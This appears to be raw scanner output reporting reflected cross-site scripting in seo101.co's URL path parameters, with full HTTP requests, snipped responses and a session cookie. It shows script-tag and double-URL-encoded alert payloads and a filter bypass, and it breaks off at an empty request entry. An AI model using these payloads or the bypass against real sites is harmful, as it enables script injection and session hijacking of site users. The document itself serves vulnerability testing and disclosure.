GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png15079%253balert%25281%2529%252f%252ff90119d5a01 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/logo.png15079;alert(1)//f90119d5a01 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de68d"><script>alert(1)</script>832b0275f9 was submitted in the REST URL parameter 1. This input was echoed as de68d\"><script>alert(1)</script>832b0275f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cde68d"><script>alert(1)</script>832b0275f9/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9da1</script><script>alert(1)</script>c5e7dbceb46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cb9da1</script><script>alert(1)</script>c5e7dbceb46/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 16416><script>alert(1)</script>e9dfc5f28c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C16416><script>alert(1)</script>e9dfc5f28c3/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 8b775><script>alert(1)</script>9a25589bf7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/8b775><script>alert(1)</script>9a25589bf7e/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</8b775><script>alert(1)</script>9a25589bf7e/img/pr/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c6d0c%253balert%25281%2529%252f%252f1105b1b95e7 was submitted in the REST URL parameter 2. This input was echoed as c6d0c;alert(1)//1105b1b95e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cc6d0c%253balert%25281%2529%252f%252f1105b1b95e7/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <c6d0c;alert(1)//1105b1b95e7/img/pr/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecddb"><script>alert(1)</script>577e624468a was submitted in the REST URL parameter 2. This input was echoed as ecddb\"><script>alert(1)</script>577e624468a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cecddb"><script>alert(1)</script>577e624468a/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <ecddb\"><script>alert(1)</script>577e624468a/img/pr/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 74406%253balert%25281%2529%252f%252f7d9fcaa0afe was submitted in the REST URL parameter 3. This input was echoed as 74406;alert(1)//7d9fcaa0afe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img74406%253balert%25281%2529%252f%252f7d9fcaa0afe/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img74406;alert(1)//7d9fcaa0afe/pr/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 180d3"><script>alert(1)</script>c597ac93db1 was submitted in the REST URL parameter 3. This input was echoed as 180d3\"><script>alert(1)</script>c597ac93db1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img180d3"><script>alert(1)</script>c597ac93db1/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img180d3\"><script>alert(1)</script>c597ac93db1/pr/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9df0e%253balert%25281%2529%252f%252f122f42146bc was submitted in the REST URL parameter 4. This input was echoed as 9df0e;alert(1)//122f42146bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr9df0e%253balert%25281%2529%252f%252f122f42146bc/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr9df0e;alert(1)//122f42146bc/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d84"><script>alert(1)</script>72775ac808d was submitted in the REST URL parameter 4. This input was echoed as 64d84\"><script>alert(1)</script>72775ac808d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr64d84"><script>alert(1)</script>72775ac808d/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr64d84\"><script>alert(1)</script>72775ac808d/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d0ec9%253balert%25281%2529%252f%252f754bd66a136 was submitted in the REST URL parameter 5. This input was echoed as d0ec9;alert(1)//754bd66a136 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1d0ec9%253balert%25281%2529%252f%252f754bd66a136/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/1d0ec9;alert(1)//754bd66a136/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db7b"><script>alert(1)</script>3c5c586d294 was submitted in the REST URL parameter 5. This input was echoed as 1db7b\"><script>alert(1)</script>3c5c586d294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/11db7b"><script>alert(1)</script>3c5c586d294/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/11db7b\"><script>alert(1)</script>3c5c586d294/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a984%253balert%25281%2529%252f%252f3cc40906233 was submitted in the REST URL parameter 6. This input was echoed as 9a984;alert(1)//3cc40906233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif9a984%253balert%25281%2529%252f%252f3cc40906233 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/1/pr5.gif9a984;alert(1)//3cc40906233 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9b1"><script>alert(1)</script>dec17e82b5e was submitted in the REST URL parameter 6. This input was echoed as fb9b1\"><script>alert(1)</script>dec17e82b5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.giffb9b1"><script>alert(1)</script>dec17e82b5e HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr/1/pr5.giffb9b1\"><script>alert(1)</script>dec17e82b5e seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3eb</script><script>alert(1)</script>94b5fac151e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C9a3eb</script><script>alert(1)</script>94b5fac151e/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c5e8"><script>alert(1)</script>7ad64fba9e8 was submitted in the REST URL parameter 1. This input was echoed as 7c5e8\"><script>alert(1)</script>7ad64fba9e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C7c5e8"><script>alert(1)</script>7ad64fba9e8/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload f4813><script>alert(1)</script>f547a5adbb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cf4813><script>alert(1)</script>f547a5adbb5/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18d34%253balert%25281%2529%252f%252fa8813a39408 was submitted in the REST URL parameter 2. This input was echoed as 18d34;alert(1)//a8813a39408 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C18d34%253balert%25281%2529%252f%252fa8813a39408/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <18d34;alert(1)//a8813a39408/img/today.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 886ff><script>alert(1)</script>f494c8a10a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/886ff><script>alert(1)</script>f494c8a10a0/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</886ff><script>alert(1)</script>f494c8a10a0/img/today.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 213dd"><script>alert(1)</script>7992ca893d was submitted in the REST URL parameter 2. This input was echoed as 213dd\"><script>alert(1)</script>7992ca893d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C213dd"><script>alert(1)</script>7992ca893d/img/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <213dd\"><script>alert(1)</script>7992ca893d/img/today.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d8c3f%253balert%25281%2529%252f%252f4367197c4a2 was submitted in the REST URL parameter 3. This input was echoed as d8c3f;alert(1)//4367197c4a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
